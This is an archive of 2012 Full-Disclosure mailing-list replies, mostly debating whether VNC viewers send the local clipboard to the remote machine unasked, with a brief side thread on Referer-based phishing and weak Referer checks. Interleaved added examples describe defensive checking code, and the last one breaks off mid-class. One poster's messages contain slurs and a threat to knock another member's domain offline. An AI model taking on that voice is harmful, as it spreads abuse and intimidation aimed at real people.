Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged.

I don't think that is what Ben is saying. The clipboard gets sent to the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So whatever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a clipboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report makes complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =)

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
have the clipboard disabled... On 01/25/2012 08:44 AM, Peter Osterberg wrote: I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =)
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
On 25.01.2012 5:45, Ben Bucksch wrote: On 25.01.2012 00:52, Henri Salo wrote: On Wed, Jan 25, 2012 at 12:47:28AM +0100, Ben Bucksch wrote: On 25.01.2012 00:09, Dan Kaminsky wrote: IP KVM, in which the foreign server basically gets only inbound Keyboard and Mouse and outbound uncompressed pixels. That is *precisely* what VNC is: an open-source IP KVM. What the hell? Seriously.. http://en.wikipedia.org/wiki/VNC hihi. Thanks. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction, over a network. The VNC protocol (RFB) is very simple, based on one graphic primitive from server to client ('Put a rectangle of pixel data at the specified X,Y position') and event messages from client to server. Compare to above. Now, the part where it defines that clipboard is also a standard part of VNC... oh, huch, it's not there! (Just a random note that Unicode is impossible, but not that clipboard is defined as part of the protocol at all.) Ah, I know... Surely, it must be on http://en.wikipedia.org/wiki/RFB_protocol... No, same thing there. Strange. It should be strictly understood that something not being mentioned in the Wikipedia article doesn't mean that doesn't exist at all, since Wikipedia is _not_ authoritative information source. The authoritative information source would be the formal specification of the protocol explicitly defining the set of event types and explicitly prohibiting non-defined event types, otherwise implementations are free to define and use their own event types being in fact extensions of the protocol. It's defined nowhere that VNC is _exactly_ open-source IP KVM and nothing more. P.S. I was just reporting bug. I hope at least some software finds a better solution. Have fun. 
I'd suggest you find alternative product allowing you to explicitly configure that clipboard is not transmitted to the host under control instead of struggling with the product limitations and design flaws. -- Sincerely Yours, Dan.
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
you are seriously more retarded than even the n3td3v+me+you together...damn army..! On 25 January 2012 19:29, Peter Osterberg j...@vel.nu wrote: Wasn't the original thread originally about VNC? On 01/25/2012 09:27 AM, GloW - XD wrote: derp, do you know what KVM IP is ? readup on how that relays ;) thats that. XD On 25 January 2012 18:44, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. 
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
nice to send THIS one to fd, and you ssomehow admit to knowing it here yet, i told you what it was, exactly, dont try make me look bad fag, or i will drop your fucking domain, for a month :) ciao beech,. xd On 25 January 2012 19:55, Dan Yefimov d...@lightwave.net.ru wrote: On 25.01.2012 5:45, Ben Bucksch wrote: On 25.01.2012 00:52, Henri Salo wrote: On Wed, Jan 25, 2012 at 12:47:28AM +0100, Ben Bucksch wrote: On 25.01.2012 00:09, Dan Kaminsky wrote: IP KVM, in which the foreign server basically gets only inbound Keyboard and Mouse and outbound uncompressed pixels. That is *precisely* what VNC is: an open-source IP KVM. What the hell? Seriously.. http://en.wikipedia.org/wiki/VNC hihi. Thanks. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction, over a network. The VNC protocol (RFB) is very simple, based on one graphic primitive from server to client ('Put a rectangle of pixel data at the specified X,Y position') and event messages from client to server. Compare to above. Now, the part where it defines that clipboard is also a standard part of VNC... oh, huch, it's not there! (Just a random note that Unicode is impossible, but not that clipboard is defined as part of the protocol at all.) Ah, I know... Surely, it must be on http://en.wikipedia.org/wiki/RFB_protocol... No, same thing there. Strange. It should be strictly understood that something not being mentioned in the Wikipedia article doesn't mean that doesn't exist at all, since Wikipedia is _not_ authoritative information source. The authoritative information source would be the formal specification of the protocol explicitly defining the set of event types and explicitly prohibiting non-defined event types, otherwise implementations are free to define and use their own event types being in fact extensions of the protocol. It's defined nowhere that VNC is _exactly_ open-source IP KVM and nothing more. P.S. 
I was just reporting bug. I hope at least some software finds a better solution. Have fun. I'd suggest you find alternative product allowing you to explicitly configure that clipboard is not transmitted to the host under control instead of struggling with the product limitations and design flaws. -- Sincerely Yours, Dan.
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
ooops my bad, wriong guy, or, you dont understand this either ? On 25 January 2012 19:55, Dan Yefimov d...@lightwave.net.ru wrote: On 25.01.2012 5:45, Ben Bucksch wrote: On 25.01.2012 00:52, Henri Salo wrote: On Wed, Jan 25, 2012 at 12:47:28AM +0100, Ben Bucksch wrote: On 25.01.2012 00:09, Dan Kaminsky wrote: IP KVM, in which the foreign server basically gets only inbound Keyboard and Mouse and outbound uncompressed pixels. That is *precisely* what VNC is: an open-source IP KVM. What the hell? Seriously.. http://en.wikipedia.org/wiki/VNC hihi. Thanks. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction, over a network. The VNC protocol (RFB) is very simple, based on one graphic primitive from server to client ('Put a rectangle of pixel data at the specified X,Y position') and event messages from client to server. Compare to above. Now, the part where it defines that clipboard is also a standard part of VNC... oh, huch, it's not there! (Just a random note that Unicode is impossible, but not that clipboard is defined as part of the protocol at all.) Ah, I know... Surely, it must be on http://en.wikipedia.org/wiki/RFB_protocol... No, same thing there. Strange. It should be strictly understood that something not being mentioned in the Wikipedia article doesn't mean that doesn't exist at all, since Wikipedia is _not_ authoritative information source. The authoritative information source would be the formal specification of the protocol explicitly defining the set of event types and explicitly prohibiting non-defined event types, otherwise implementations are free to define and use their own event types being in fact extensions of the protocol. It's defined nowhere that VNC is _exactly_ open-source IP KVM and nothing more. P.S. I was just reporting bug. I hope at least some software finds a better solution. Have fun. 
I'd suggest you find alternative product allowing you to explicitly configure that clipboard is not transmitted to the host under control instead of struggling with the product limitations and design flaws. -- Sincerely Yours, Dan.
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
I could never lower myself to your level so I guess you win On 01/25/2012 10:32 AM, GloW - XD wrote: you are seriously more retarded than even the n3td3v+me+you together...damn army..! On 25 January 2012 19:29, Peter Osterberg j...@vel.nu wrote: Wasn't the original thread originally about VNC? On 01/25/2012 09:27 AM, GloW - XD wrote: derp, do you know what KVM IP is ? readup on how that relays ;) thats that. XD On 25 January 2012 18:44, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. 
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
IP KVM, in which the foreign server basically gets only inbound Keyboard and Mouse and outbound uncompressed pixels. That is *precisely* what VNC is: an open-source IP KVM. No, it's not. I won't go into the differences because other people already did in this thread. And please don't turn this into you're stupid, because I've seen others with the same setup. As mentioned, I know of a government agency with highly competent IT staff who had a similar setup: normal and sensitive work is on the desktop/notebook and Internet access (which is considered insecure) is on a remote machine, with a viewer on the desktop. That proves nothing. For example, there are many SCADA devices owned by government agencies connected to the Internet, but that doesn't mean it's a good idea to do so. -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... 
Is there a clipboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report makes complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
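An added example, not part of any post in this thread: a way to check on the wire whether a viewer pushes clipboard text before the user touches the session. It walks a plaintext client-to-server RFB byte stream using the message layouts from RFC 6143 section 7.5 and reports any ClientCutText seen before the first KeyEvent or PointerEvent. The function names, the "before first input" heuristic and the sample stream are assumptions constructed for illustration, and the stream is assumed to start right after ClientInit.

```python
import struct

# Client-to-server message layouts from RFC 6143, section 7.5.
# Sizes are total bytes including the leading message-type byte.
FIXED_SIZE = {0: 20, 3: 10, 4: 8, 5: 6}
NAMES = {
    0: "SetPixelFormat", 2: "SetEncodings", 3: "FramebufferUpdateRequest",
    4: "KeyEvent", 5: "PointerEvent", 6: "ClientCutText",
}
USER_INPUT = {"KeyEvent", "PointerEvent"}


def parse_client_messages(stream: bytes):
    """Return [(name, payload_bytes), ...] for a plaintext client-to-server
    stream that starts right after ClientInit (assumption of this sketch)."""
    out, pos, end = [], 0, len(stream)
    while pos < end:
        mtype = stream[pos]
        if mtype in FIXED_SIZE:
            size = FIXED_SIZE[mtype]
        elif mtype == 2:
            # type, 1 pad byte, U16 number-of-encodings, then one S32 each
            if pos + 4 > end:
                raise ValueError("truncated SetEncodings header")
            (count,) = struct.unpack_from(">H", stream, pos + 2)
            size = 4 + 4 * count
        elif mtype == 6:
            # type, 3 pad bytes, U32 length, then `length` bytes of text
            if pos + 8 > end:
                raise ValueError("truncated ClientCutText header")
            (length,) = struct.unpack_from(">I", stream, pos + 4)
            size = 8 + length
        else:
            # Vendor extensions are not modelled; fail loudly instead of guessing
            raise ValueError(f"unknown message type {mtype} at offset {pos}")
        if pos + size > end:
            raise ValueError(f"truncated {NAMES[mtype]} at offset {pos}")
        header = 8 if mtype == 6 else 1
        out.append((NAMES[mtype], stream[pos + header:pos + size]))
        pos += size
    return out


def clipboard_before_input(stream: bytes):
    """Clipboard texts the viewer sent before any KeyEvent/PointerEvent."""
    early = []
    for name, payload in parse_client_messages(stream):
        if name in USER_INPUT:
            break
        if name == "ClientCutText":
            # The base protocol carries cut text as Latin-1
            early.append(payload.decode("latin-1"))
    return early


def cut_text_message(text: str) -> bytes:
    """Build a ClientCutText message (used only for the constructed sample)."""
    data = text.encode("latin-1")
    return struct.pack(">B3xI", 6, len(data)) + data


# Constructed sample: what a viewer might send after connecting.
SAMPLE_STREAM = b"".join([
    bytes([0]) + bytes(19),                                # SetPixelFormat
    struct.pack(">BxH", 2, 2) + struct.pack(">ii", 0, 1),  # SetEncodings
    struct.pack(">BBHHHH", 3, 0, 0, 0, 800, 600),          # FramebufferUpdateRequest
    cut_text_message("constructed-secret"),                # sent with no user action
    struct.pack(">BBHH", 5, 0, 10, 10),                    # PointerEvent
    struct.pack(">BBxxI", 4, 1, 0x61),                     # KeyEvent ('a' pressed)
    cut_text_message("copied later"),                      # after interaction
])

if __name__ == "__main__":
    for text in clipboard_before_input(SAMPLE_STREAM):
        print("clipboard sent before any input:", repr(text))
```

Run against a capture taken with the viewer's clipboard option on and then off, the result shows whether the setting actually stops the transfer.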
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
Fair enough :) On Wed, Jan 25, 2012 at 10:59 AM, Peter Osterberg j...@vel.nu wrote: On 01/25/2012 10:54 AM, Mario Vilas wrote: The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. That may very well be true. I am not trying to debate that. -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] Using HTTP referer for phishing attacks
This could be also used in some cases to Refer requests from paypal or such payment systems when there is no/bad validation checks on an e-commerce website. ie: if(Referer.Contains("paypal.com")) { ok } but what if i control mypaypal.com? On 24/01/2012 20:14, Jan Wrobel wrote: Hi, Sorry if this is not new, but I didn't manage to find any mention of such a technique. In short: HTTP referer field contains information where the web user is coming from, which is often a trusted site such as a web search. Having such information, a malicious web site can use several tricks to fool the user into thinking that he or she returned to the referring site. In fact, the user is taken to a generic phishing site that intercepts all data exchanged between the user, the referring site and sites visited from the referring site. More detailed write up with few examples is here: http://mixedbit.org/referer.html Cheers, Jan -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art.
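An added example, not code from the post or from any real shop: the substring check quoted above next to a hostname comparison, run over constructed Referer values including the mypaypal.com case. The allowlist, function names and sample URLs are assumptions for illustration.

```python
from urllib.parse import urlsplit

# Assumed allowlist for this sketch; a real integration would take the
# hostnames from the payment provider's documentation.
TRUSTED_HOSTS = {"paypal.com", "www.paypal.com"}


def naive_referer_check(referer: str) -> bool:
    """The check quoted in the post: substring match anywhere in the header."""
    return "paypal.com" in referer


def strict_referer_check(referer: str) -> bool:
    """Parse the URL and compare the exact hostname against the allowlist."""
    try:
        parts = urlsplit(referer)
        host = parts.hostname  # lower-cased, userinfo and port stripped
    except ValueError:
        return False
    if parts.scheme != "https" or not host:
        return False
    return host.rstrip(".") in TRUSTED_HOSTS


# Constructed Referer values: one genuine, the rest only contain the string.
SAMPLES = [
    "https://www.paypal.com/checkout",
    "https://mypaypal.com/return",            # the case raised in the post
    "https://paypal.com.example.net/",        # trusted name as a subdomain label
    "https://example.net/?from=paypal.com",   # trusted name in the query string
    "https://paypal.com@example.net/",        # trusted name as userinfo
    "http://www.paypal.com/",                 # right host, plaintext scheme
]


def accepted_only_by_naive(samples):
    """Referers the substring check accepts but the hostname check rejects."""
    return [r for r in samples
            if naive_referer_check(r) and not strict_referer_check(r)]


if __name__ == "__main__":
    for r in SAMPLES:
        print(f"{r:45} naive={naive_referer_check(r)!s:5} "
              f"strict={strict_referer_check(r)}")
    # The Referer header is supplied by the client, so even the strict check
    # is a consistency test and not evidence that a payment happened.
```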
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
On 01/25/2012 10:54 AM, Mario Vilas wrote: The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. That may very well be true. I am not trying to debate that.
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. 
Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So whatever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a clipboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report makes complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] Using HTTP referer for phishing attacks
hrm now thats indeed of interest... good to point out...thx. On 25 January 2012 21:09, Jerome Athias jer...@netpeas.com wrote: This could be also used in some cases to Refer requests from paypal or such payment systems when there is no/bad validation checks on an e-commerce website. ie: if(Referer.Contains("paypal.com")) { ok } but what if i control mypaypal.com? On 24/01/2012 20:14, Jan Wrobel wrote: Hi, Sorry if this is not new, but I didn't manage to find any mention of such a technique. In short: HTTP referer field contains information where the web user is coming from, which is often a trusted site such as a web search. Having such information, a malicious web site can use several tricks to fool the user into thinking that he or she returned to the referring site. In fact, the user is taken to a generic phishing site that intercepts all data exchanged between the user, the referring site and sites visited from the referring site. More detailed write up with few examples is here: http://mixedbit.org/referer.html Cheers, Jan -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art.
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
Windows is even more secure, have you actually, read any of the code / On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. 
The clipboard gets sent to the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So whatever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a clipboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report makes complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
INSECURE i mean*
On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On Windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris.
On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them.
On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote:
On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged.
I don't think that is what Ben is saying. The clipboard gets sent to the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So whatever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a clipboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report makes complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =)
-- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
No, I only read the manual. Now go troll somewhere else. :)
On Wed, Jan 25, 2012 at 11:35 AM, GloW - XD doo...@gmail.com wrote: Windows is even more secure, have you actually, read any of the code /
On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On Windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris.
On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them.
On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote:
On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged.
I don't think that is what Ben is saying. The clipboard gets sent to the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So whatever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a clipboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report makes complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =)
-- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
On 25.01.2012 08:44, Peter Osterberg wrote: I don't think that is what Ben is saying. The clipboard gets sent to the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed.
Exactly. I take offense in that "without the user knowing it" part. I chose my reproduction specifically with a mouse action and not Ctrl-V so that the VNC viewer cannot know I tried to paste in notepad.exe and cannot have transmitted the information at that moment only. It means that Windows had the information all along, at the moment when I copied, which means the remote Windows reads all my copies on the local X11, not just when I paste in Windows. That and only that is the problem.
Possible solution, concretely: Paste button on VNC viewer toolbar
If the user presses the button, the viewer sends the clipboard to the remote machine at that moment, and then triggers a Ctrl-V keypress in the remote machine. If the user doesn't press the button, but focuses the VNC viewer and presses Ctrl-V, the viewer sends the clipboard to the remote machine and only then sends the Ctrl-V to the remote machine.
In both cases, mouse or keyboard, you wouldn't need any more actions in practice. You still do Ctrl-C in your Linux app, switch to the viewer, press Ctrl-V there, and you got the text in notepad.exe.
Of course that would be configurable so that you can change the key combo, e.g. for Macs, or to disable sending the key combo after the Paste button, or to disable the clipboard entirely.
Dan Yefimov, the RFB specification from 2007 happens to be linked from the page I mentioned, and funny enough... copypaste / clipboard isn't mentioned with a single word either. Now, obviously, it is possible somehow, because it's working, so there is some way, but it was never part of the protocol. And it cannot be claimed that every user somehow naturally knows how exactly it works and he realizes what it implies concretely for his work.
Ben
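The send-on-paste proposal in the message above, sketched as viewer-side logic next to the send-on-copy behaviour the thread describes. This is an added example, not code from any VNC viewer: the `ClipboardBridge` class, its policy names and the sample strings are hypothetical, and the two encoders follow the RFB ClientCutText (type 6) and KeyEvent (type 4) message layouts.

```python
import struct

CLIENT_CUT_TEXT = 6      # RFB client-to-server message types
KEY_EVENT = 4
XK_CONTROL_L = 0xFFE3    # X11 keysyms used for the synthetic Ctrl-V
XK_V = 0x0076

# Constructed sample clipboard contents.
INITIAL = "copied before connecting"
SECRET = "constructed-secret-for-local-app"
WANTED = "text meant for the remote notepad"


def client_cut_text(text):
    """Encode ClientCutText: type, 3 pad bytes, u32 length, Latin-1 text."""
    data = text.encode("latin-1", errors="replace")
    return struct.pack(">B3xI", CLIENT_CUT_TEXT, len(data)) + data


def key_event(keysym, down):
    """Encode KeyEvent: type, down flag, 2 pad bytes, u32 keysym."""
    return struct.pack(">BB2xI", KEY_EVENT, 1 if down else 0, keysym)


def ctrl_v():
    return [key_event(XK_CONTROL_L, True), key_event(XK_V, True),
            key_event(XK_V, False), key_event(XK_CONTROL_L, False)]


class ClipboardBridge:
    """Decides when the local clipboard may cross to the server (hypothetical)."""

    POLICIES = ("on_copy", "on_paste", "disabled")

    def __init__(self, policy, initial=None, send_paste_key=True):
        if policy not in self.POLICIES:
            raise ValueError("unknown policy: %r" % policy)
        self.policy = policy
        self.send_paste_key = send_paste_key
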